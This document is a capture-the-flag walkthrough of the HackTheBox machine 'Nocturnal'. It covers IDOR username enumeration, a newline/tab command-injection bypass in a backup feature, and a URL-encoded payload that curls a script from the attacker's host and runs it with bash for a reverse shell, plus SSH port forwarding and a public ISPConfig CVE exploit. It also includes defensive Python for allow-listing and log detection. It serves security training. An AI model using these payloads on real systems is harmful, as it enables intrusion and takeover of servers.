This is a walkthrough of the HackTheBox machine "Nocturnal".
`Nocturnal` is a medium-difficulty Linux machine demonstrating an IDOR vulnerability in a PHP web application, allowing access to other users' uploaded files. Credentials are retrieved to log in to the admin panel, where the application's source code is accessed. A command injection vulnerability is identified, providing a reverse shell as the `www-data` user. Password hashes are extracted from a SQLite database and cracked to obtain SSH access as the `tobias` user. Exploiting [CVE-2023-46818](https://nvd.nist.gov/vuln/detail/CVE-2023-46818) in the `ISPConfig` application grants remote command execution, leading to privilege escalation to the `root` user.
"Start the machine and get the target machine IP address"
Now, let's connect our attack machine to the VPN using the OpenVPN client to get access to the machine.
After connecting to the VPN, we get another IP address starting with 10.10.x.x on the tun0 interface by default.
Here our target IP address is: 10.10.11.64
Now, using nmap, we will scan for all open ports with the following command:

```bash
nmap -p- -T5 10.10.11.64
```

Explanation of the command: `-p-` scans all 65535 TCP ports instead of nmap's default top 1000, and `-T5` selects the fastest ("insane") timing template.
We found a total of 2 open ports:

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Once we have identified the open ports, let's scan these two ports specifically to find the versions of the running services and other information such as OS detection.
From the above output we can see that a website is running on HTTP port 80 on nginx version 1.18.0. Also, it redirects to http://nocturnal.htb.
Now, let's add the target IP address to the hosts file so we can access the website directly via the domain name (nocturnal.htb). File path: /etc/hosts
You can see we have added the entry to the hosts file; now let's access the website.
You can also review the source code of the website by right-clicking on the page and choosing "View page source", or simply by pressing Ctrl+U.
By reviewing it, we find that the website has register and login functionality. Let's register an account and then try to log in with it.
We have created an account with username: teffie and password: teffie.
Now, let's log in. After logging in we get a page with file upload functionality, so let's try to upload a file.
When I uploaded a text file (.txt), it showed me this error message:
“Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.”
For now, let's just try to upload a file of one of the allowed types and see what happens.
After uploading a file, we can access it by clicking on it. When we click on the file, it starts downloading; that means it is sending a request. To see that request, let's open the page source.
We can see that the file is requested through view.php with the URL: http://nocturnal.htb/view.php?username=teffie&page=shell.php.doc
Here, the username parameter is passed in a GET request. We can try to change it and see if it returns something interesting.
It shows a "User Not Found" error. We can enumerate usernames with ffuf. For that we need a wordlist of usernames, which can be found in SecLists: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt

```bash
ffuf -w '/usr/share/wordlists/seclists/Usernames/Names/names.txt' -u 'http://nocturnal.htb/view.php?username=FUZZ&file=shell.php.doc' -H 'Cookie: PHPSESSID=vcdtk8so2i86fbrn3ps4t7lt62'
```

Copy the session cookie and pass it to ffuf, because we are currently logged in and the request to view.php has to come from that session. Also note that the response size for a request with a wrong username is 2985 bytes, which can be confirmed in the screenshot.
Let's filter out responses of that size with -fs 2985. Reviewing the output, we find a total of 4 usernames. You can go through all of them, but let's open the page for the username amanda.
After visiting the page, we can see there is a file called "privacy.odt". Click on it to download the file; it may contain interesting data or information.
Let's open privacy.odt and review it. An .odt document is a zip archive, so by opening it we find multiple files and folders. In the Thumbnails folder there is an image, thumbnail.png, which shows a letter to amanda in which her password is mentioned. We can also find the same password inside the content.xml file.
We have found the password for amanda: arHkG7HAI68X8s1J
Now, let's log in to the web portal as the amanda user. We get the admin panel.
From here, by clicking on a file name, we can see the source code of every file present. There is also an interesting "Create Backup" function; let's use it and see if we find anything interesting.
Reviewing the output of the backup, we can see it is almost identical to the output of the zip command used to build zip archives. So we can assume that the application runs the zip tool with our supplied password parameter, since zip has a -P flag for protecting an archive with a password:

```bash
zip <backup-filename> admin.php register.php login.php index.php dashboard.php -P <password-parameter>
```

So we can try to put shell escape-sequence characters in our input to terminate the zip command and run another command of our choosing (command injection).
Reviewing the source code of admin.php using the functionality above, we find an interesting function that filters our input (the password parameter) before the backup is taken.
That means we can't use the following characters: ';', '&', '|', '$', ' ' (space), '`', '{', '}' and '&&'. The filter does not block \n or \t (newline or tab), though. Since the request is sent with the GET method, we have to URL-encode them and place our command after the escape character: a tab is encoded as %09 and a newline as %0a.

Payload:

```
password%0Acurl%09http://10.10.14.121
```

Here %0a represents \n, and after it comes our curl command, which requests a web server running on our attack machine. Start that server with the following Python command:

```bash
python3 -m http.server 80
```

Note: I have used "curl http://10.10.14.121" as the original payload, where the IP address is my tun0 interface address, which I got after connecting to the VPN; you may have a different IP address.
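As an added example (not code from the machine or from this walkthrough), the deny-list described above modelled in Python next to an allow-list check: the deny-list passes the newline/tab payload, a fullmatch allow-list rejects it, and building zip's argument vector directly means no shell ever parses the password. The blocked character set is taken from the text; the allow-list policy and the two sample passwords are assumptions.

```python
import re

# Deny-list reproduced from the characters the walkthrough says admin.php rejects
# (a Python model of the PHP check, not the application's own code).
BLOCKLIST = (";", "&", "|", "$", " ", "`", "{", "}", "&&")

def blocklist_allows(value: str) -> bool:
    """The application's approach: reject only the listed characters."""
    return not any(bad in value for bad in BLOCKLIST)

# Allow-list alternative (assumed policy): letters, digits and a few punctuation marks,
# and no leading "-" so the value can never be read by zip as an option.
# fullmatch() is deliberate: re.match() with a trailing "$" would still accept "pw\n".
ALLOWED = re.compile(r"[A-Za-z0-9._@!][A-Za-z0-9._@!-]{0,63}")

def allowlist_allows(value: str) -> bool:
    """Accept a value only if every character is explicitly permitted."""
    return ALLOWED.fullmatch(value) is not None

def build_zip_argv(backup_name: str, password: str) -> list:
    """Build the zip invocation from the walkthrough as an argv list (the PHP equivalent
    would be the allow-list check plus escapeshellarg()); no shell sees the password."""
    if not allowlist_allows(password):
        raise ValueError("password rejected by allow-list")
    files = ["admin.php", "register.php", "login.php", "index.php", "dashboard.php"]
    return ["zip", backup_name] + files + ["-P", password]

def rejected_by_allowlist(password: str) -> bool:
    """True when build_zip_argv refuses the password."""
    try:
        build_zip_argv("backup.zip", password)
    except ValueError:
        return True
    return False

# Constructed inputs: a normal password and the walkthrough's payload, URL-decoded.
NORMAL_PASSWORD = "Backup2024!"
INJECTED_PASSWORD = "password\ncurl\thttp://10.10.14.121"

if __name__ == "__main__":
    for label, pw in (("normal", NORMAL_PASSWORD), ("injected", INJECTED_PASSWORD)):
        print(f"{label}: deny-list={blocklist_allows(pw)} allow-list={allowlist_allows(pw)}")
```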
After starting the server, send the payload in the password parameter and click on Create Backup. You can use Burp Suite or even curl to make the request.
Now that we have confirmed the command executes and reaches our server, let's run a payload that uses curl to download a reverse-shell script from our machine onto the target and then executes it to get a reverse shell.
Once this payload executes on the target, it returns a shell to our attack machine. Start a netcat listener on port 4444 to receive the connection.

URL-encoded payload:

```
test%0Acurl%09http://10.10.14.121/shell%09-o%09shell%0A/bin/bash%09shell
```

I used Burp Suite to make the request; you can also use curl.
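As an added example (not from the walkthrough or the machine), the detection side of both techniques used so far: parsing constructed nginx access-log lines and flagging one client requesting view.php for many different usernames (the ffuf enumeration) and URL-encoded newline/tab bytes in a query string (the backup-password injection). The log lines, the admin.php parameter names and the alert threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# nginx "combined" format: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
                    r'(?P<status>\d+) (?P<size>\d+)')
# URL-encoded LF, CR or TAB: the only form in which the payload can appear in a raw URI.
CONTROL_CHARS = re.compile(r"%0[aAdD]|%09")

# Constructed log lines modelled on the requests in this walkthrough (admin.php parameter names and sizes assumed).
SAMPLE_LOG = """\
10.10.14.121 - - [12/May/2025:10:00:01 +0000] "GET /view.php?username=teffie&file=shell.php.doc HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
10.10.14.121 - - [12/May/2025:10:00:02 +0000] "GET /view.php?username=aaron&file=shell.php.doc HTTP/1.1" 200 2985 "-" "Fuzz Faster U Fool v2.1.0"
10.10.14.121 - - [12/May/2025:10:00:02 +0000] "GET /view.php?username=amanda&file=shell.php.doc HTTP/1.1" 200 3310 "-" "Fuzz Faster U Fool v2.1.0"
10.10.14.121 - - [12/May/2025:10:00:03 +0000] "GET /view.php?username=adam&file=shell.php.doc HTTP/1.1" 200 2985 "-" "Fuzz Faster U Fool v2.1.0"
10.10.14.121 - - [12/May/2025:10:05:10 +0000] "GET /admin.php?backup=1&password=test%0Acurl%09http://10.10.14.121/shell%09-o%09shell%0A/bin/bash%09shell HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.14.5 - - [12/May/2025:10:06:00 +0000] "GET /view.php?username=bob&file=notes.odt HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""

def parse(line):
    """Split one access-log line into fields; the query string is kept raw (still percent-encoded)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["uri"])
    rec["path"], rec["query"] = parts.path, parts.query
    rec["params"] = parse_qs(parts.query)          # decoded copy, used for the username rule
    return rec

def detect(log_text, enum_threshold=3):
    """Return (rule, client, detail) alerts for the two attack patterns in this walkthrough."""
    alerts, usernames_by_ip = [], defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        # Rule 1: encoded newline/tab in a query string (the command-injection payload).
        if CONTROL_CHARS.search(rec["query"]):
            alerts.append(("control-chars-in-query", rec["ip"], rec["path"]))
        # Rule 2: one client asking view.php for many different usernames (IDOR enumeration).
        if rec["path"] == "/view.php":
            for user in rec["params"].get("username", []):
                usernames_by_ip[rec["ip"]].add(user)
    for ip, names in usernames_by_ip.items():
        if len(names) >= enum_threshold:
            alerts.append(("username-enumeration", ip, len(names)))
    return alerts
```

Running `detect(SAMPLE_LOG)` yields one alert per rule, both attributed to 10.10.14.121; the second client, which looked at a single username, stays below the threshold.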
After exploring a bit, I found the database of nocturnal.htb and the password hashes in it, and tried to log in via SSH with the cracked passwords and their respective users. In the screenshot, I have marked the commands I entered in the reverse shell.
On the CrackStation website, we found the cleartext passwords; let's try them one by one with their respective usernames.
We successfully logged in using username: "tobias" and password: "slowmotionapocalypse"
Found user flag in home directory of the tobias user: 6cd940e6f66584666eec1193396e1da9
After exploring other functionality, files and directories to elevate privileges on the target machine, I found that the machine is running a local server on port 8080. We can check that using the ss or netstat command.
I curled that server and got a positive response, which means the server is running, but we can't access it directly from our attack machine's browser. If we can somehow manage to reach it directly from our attack machine, our workload will reduce a bit.
There is a way of doing that: port forwarding.
Port forwarding redirects traffic from a port on the remote machine to a port on our local machine. From our attack machine we can only reach the target's port 80, where the main nginx web server for nocturnal.htb is running; if you try to reach the internal server on port 8080 from outside, you won't get a positive response.
Syntax for port forwarding:

```bash
ssh -L [local_port]:[remote_host]:[remote_port] user@ssh_server
```

Actual command:

```bash
ssh -L 8081:127.0.0.1:8080 -N -vv [email protected]
```

Now let's try this out.
With this command, SSH listens on port 8081 on our localhost and forwards every connection to it, through the SSH session with "[email protected]", to 127.0.0.1:8080 on the target.
Now, let's visit the site in our browser and see what the internal server has.
We found another login panel, and we have multiple credentials from the nocturnal.htb SQLite database.
By using username: admin and password: slowmotionapocalypse, we can login.
We found that ISPConfig is running version 3.2.10p1, which is vulnerable to CVE-2023-46818. We can download the exploit from GitHub: https://github.com/ajdumanhug/CVE-2023-46818
Download the exploit and run it using python.
We exploited the vulnerability and got a root shell. Afterwards, we can find the root flag at /root/root.txt.